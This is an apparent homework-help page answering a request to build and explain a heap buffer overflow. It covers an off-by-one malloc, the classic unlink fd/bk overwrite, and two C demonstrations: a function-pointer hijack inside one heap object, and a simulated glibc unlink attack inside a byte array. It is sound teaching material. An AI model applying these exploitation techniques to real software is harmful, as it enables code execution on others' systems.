Write a testing program that contains a heap buffer overflow vulnerability. Show
ID: 3886964 • Letter: W
Question
Write a testing program that contains a heap buffer overflow vulnerability. Show what the heap layout looks like and explain how to exploit it. In particular, please include in your diagram: (1) each chunk of memory allocated by malloc(), (2) their sizes in bytes, (3) metadata of the heap as it gets overwritten, (4) the sizes of this metadata in bytes, and (5) which metadata get overwritten and how the attacker controls which value can get written to any arbitrary location in memory. Again, you do not need to write the real exploit code, but you may want to use some figures to make your description clear and concise.
Explanation / Answer
Memory management in C is very important for allocating memory for local variables, global variables and dynamic allocation; these are the automatic, static and dynamic memory allocations. Appropriate use of memory allocation is the programmer's responsibility.
The figure shows the layout of process memory (high addresses at the top, low addresses at the bottom):

    High addresses
    +----------------------------------+
    | Arguments / Environment          |
    +----------------------------------+
    | Stack (grows down)               |
    +----------------------------------+
    | Unused and mapped memory         |
    +----------------------------------+
    | Heap (dynamic data, grows up)    |
    +----------------------------------+
    | Static data                      |
    +----------------------------------+
    | Program code                     |
    +----------------------------------+
    Low addresses
Heap-based buffer overflow: if a program has a buffer overflow vulnerability for a buffer allocated on the heap, there is no return address close at hand. We can describe two approaches: overwriting a function pointer and overwriting heap metadata.
Heap overflow, overwriting-a-function-pointer example:

    #include <stdlib.h>
    #include <string.h>

    void heaps(const char *m)
    {
        char *n = malloc(strlen(m));   /* one byte too few: no room for the terminating NUL */
        if (n == NULL)
            return;
        strcpy(n, m);                  /* copies strlen(m) + 1 bytes; the NUL lands past the end */
    }
The function heaps asks for one too few bytes from the heap and then writes beyond the end. What's insidious about that is that some of the time, even most of the time, it will seem to work, because the heap system allocates more space than you request. However, you might trample on control data, and then all bets are off. The heap overflow is very small, and hard to detect.
Overwriting heap metadata: the heap is a memory area where dynamically allocated data is stored. It is managed by a memory allocation library that offers functionality to allocate and free chunks of memory; in C these are the malloc() and free() functions.
The figure (not reproduced here) shows that malloc maintains a doubly linked list of free chunks. When chunk c gets unlinked, c's backward pointer is written to *(forward pointer + 12); or: the green value is written 12 bytes above where the red value points.
Exploiting a buffer overrun: the green value is written 12 bytes above where the red value points, and a buffer overrun in d can overwrite the red and green values. Make Green point to injected code, and make Red point 12 bytes below a function return address.
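As an added example that is not part of the answer above, here is the function-pointer case made concrete: a heap object whose 16-byte name field is directly followed by a function pointer, an unchecked copy that runs over that pointer, and the bounds-checked copy beside it. The names (struct job, set_name_unsafe, set_name_safe, attacker_run) and the payload are constructed for this illustration; the payload embeds the address of attacker_run directly, where a real attacker would first need an information leak to learn it.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One heap object: a 16-byte name followed by a function pointer.
 * On a 64-bit target the pointer is 8 bytes; offsetof() is used below so
 * any padding between the two fields does not matter.                    */
struct job {
    char name[16];
    void (*run)(struct job *);
};

static int hijacked;                          /* set if attacker_run executes */

static void normal_run(struct job *j)   { (void)j; }
static void attacker_run(struct job *j) { (void)j; hijacked = 1; }

/* Vulnerable: copies len bytes into name with no check against its size.
 * Input bytes beyond the name field land on j->run.                      */
static void set_name_unsafe(struct job *j, const unsigned char *src, size_t len)
{
    unsigned char *dst = (unsigned char *)j->name;
    for (size_t i = 0; i < len; i++)
        dst[i] = src[i];
}

/* Hardened: reject input that does not fit, leaving room for the NUL.    */
static int set_name_safe(struct job *j, const unsigned char *src, size_t len)
{
    if (len >= sizeof j->name)
        return -1;
    memcpy(j->name, src, len);
    j->name[len] = '\0';
    return 0;
}

/* Constructed attacker input: filler up to the run field, then the raw
 * bytes of the pointer the attacker wants installed there (assumption:
 * the attacker already knows that address).                              */
static size_t build_payload(unsigned char *out, void (*target)(struct job *))
{
    size_t off = offsetof(struct job, run);
    memset(out, 'A', off);
    memcpy(out + off, &target, sizeof target);
    return off + sizeof target;
}

/* Returns 1 if the overflow redirected the call made through j->run.     */
static int run_unsafe_demo(void)
{
    unsigned char payload[sizeof(struct job)];
    struct job *j = malloc(sizeof *j);
    if (!j)
        return -1;
    j->run = normal_run;
    hijacked = 0;
    set_name_unsafe(j, payload, build_payload(payload, attacker_run));
    j->run(j);                                /* control-flow hijack happens here */
    free(j);
    return hijacked;
}

/* Returns 1 if the bounds check rejected the input and j->run is intact. */
static int run_safe_demo(void)
{
    unsigned char payload[sizeof(struct job)];
    struct job *j = malloc(sizeof *j);
    int rejected, intact;
    if (!j)
        return -1;
    j->run = normal_run;
    hijacked = 0;
    rejected = set_name_safe(j, payload, build_payload(payload, attacker_run)) == -1;
    j->run(j);
    intact = (j->run == normal_run) && !hijacked;
    free(j);
    return rejected && intact;
}

int main(void)
{
    printf("unsafe copy hijacked the function pointer: %d\n", run_unsafe_demo());
    printf("safe copy rejected the oversized input:    %d\n", run_safe_demo());
    return 0;
}
```

The interesting part is that nothing in the allocator is touched: the overflow stays inside one malloc'd object, so no heap consistency check can catch it, and the hardened version only works because the copy length is compared against the buffer size before any byte is written.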
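A second added example, also not part of the answer above, models the metadata case the "+12" refers to: the classic 32-bit glibc chunk layout (prev_size, size, fd, bk; 4 bytes each) kept inside a byte array, with addresses as offsets into that array so the model holds both a "heap" and a "stack" slot. The toy allocator, the chunk addresses (0x100 and 0x120), STACK_RET and the NOP "shellcode" are all constructed. The model deliberately omits the check that modern glibc performs before unlinking (FD->bk == P && BK->fd == P, reported as "corrupted double-linked list"), which is what stopped this exact technique on current systems.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the classic 32-bit glibc heap (before the safe-unlinking check),
 * held in one byte array.  Addresses are offsets into mem[], so an
 * attacker-chosen "pointer" can name any location in the model.
 *
 * Chunk header (4-byte fields):
 *   +0 prev_size   +4 size   +8 fd   +12 bk      (fd/bk live only in free chunks)
 * User data of an in-use chunk starts at chunk + 8.                         */
#define MEM_SIZE   0x200
#define HEAP_BASE  0x100                 /* first chunk (constructed)            */
#define STACK_RET  0x1f0                 /* model of a saved return address      */
#define PREV_INUSE 1u

enum { PREV_SIZE = 0, SIZE = 4, FD = 8, BK = 12 };

static uint8_t  mem[MEM_SIZE];
static uint32_t heap_top;

static uint32_t rd32(uint32_t a)             { uint32_t v; memcpy(&v, mem + a, 4); return v; }
static void     wr32(uint32_t a, uint32_t v) { memcpy(mem + a, &v, 4); }

/* Bump allocator with glibc's size rule: request + 4 bytes overhead,
 * rounded up to a multiple of 8, minimum 16.  Returns the user-data address. */
static uint32_t toy_malloc(uint32_t req)
{
    uint32_t chunk = heap_top, sz = (req + 4 + 7) & ~7u;
    if (sz < 16) sz = 16;
    wr32(chunk + SIZE, sz | PREV_INUSE);
    heap_top += sz;
    return chunk + 8;
}

/* Classic unlink(P):  FD = P->fd;  BK = P->bk;  FD->bk = BK;  BK->fd = FD    */
static void unlink_chunk(uint32_t chunk)
{
    uint32_t fd = rd32(chunk + FD), bk = rd32(chunk + BK);
    wr32(fd + BK, bk);   /* write 1: bk lands 12 bytes above fd  (the "green" value) */
    wr32(bk + FD, fd);   /* write 2: fd lands 8 bytes above bk   (unavoidable side effect) */
}

static void print_layout(void)
{
    for (uint32_t c = HEAP_BASE; c < heap_top; c += rd32(c + SIZE) & ~7u)
        printf("chunk @0x%03x  size=%2u bytes  fd=0x%08x  bk=0x%08x\n",
               (unsigned)c, (unsigned)(rd32(c + SIZE) & ~7u),
               (unsigned)rd32(c + FD), (unsigned)rd32(c + BK));
}

/* Scenario: A = malloc(24) receives an unchecked 40-byte copy that runs past
 * its 24 usable bytes into B's header; later free(A) finds B marked free and
 * calls unlink(B).  Returns the value that ends up in STACK_RET.             */
static uint32_t run_attack(uint32_t shellcode_addr)
{
    uint32_t a, b_chunk;
    uint8_t  payload[40];
    /* B's header as the attacker wants it: prev_size, size (kept sane so
     * free() does not notice), fd = target - 12, bk = address of injected code */
    uint32_t hdr[4] = { 0, 0x20, STACK_RET - BK, shellcode_addr };

    memset(mem, 0, sizeof mem);
    heap_top = HEAP_BASE;
    a       = toy_malloc(24);                  /* chunk 0x100, 32 bytes, data at 0x108 */
    b_chunk = toy_malloc(24) - 8;              /* chunk 0x120, 32 bytes                */
    wr32(STACK_RET, 0xdeadbeef);               /* the genuine return address           */
    memset(mem + shellcode_addr, 0x90, 16);    /* constructed "shellcode" (NOP sled)   */

    memset(payload, 'A', 24);                  /* fills A's 24 usable data bytes       */
    memcpy(payload + 24, hdr, sizeof hdr);     /* bytes 24..39 overwrite B's header    */
    memcpy(mem + a, payload, sizeof payload);  /* the overflow itself                  */

    unlink_chunk(b_chunk);                     /* what free(A) does during consolidation */
    return rd32(STACK_RET);
}

int main(void)
{
    uint32_t ret = run_attack(0x1a0);
    print_layout();
    printf("saved return address @0x%03x is now 0x%03x (the injected code)\n",
           STACK_RET, (unsigned)ret);
    printf("side effect: 0x%03x was written at shellcode+8 (0x%03x)\n",
           (unsigned)rd32(0x1a8), 0x1a8);
    return 0;
}
```

Two things the diagram in the answer does not spell out: the attacker controls both operands of the write, since Red (fd) chooses where and Green (bk) chooses what, so any 4-byte location in the process can be targeted; and the second pointer store clobbers 4 bytes at bk + 8, inside the injected code, so the code at that address has to begin with a short jump over those bytes.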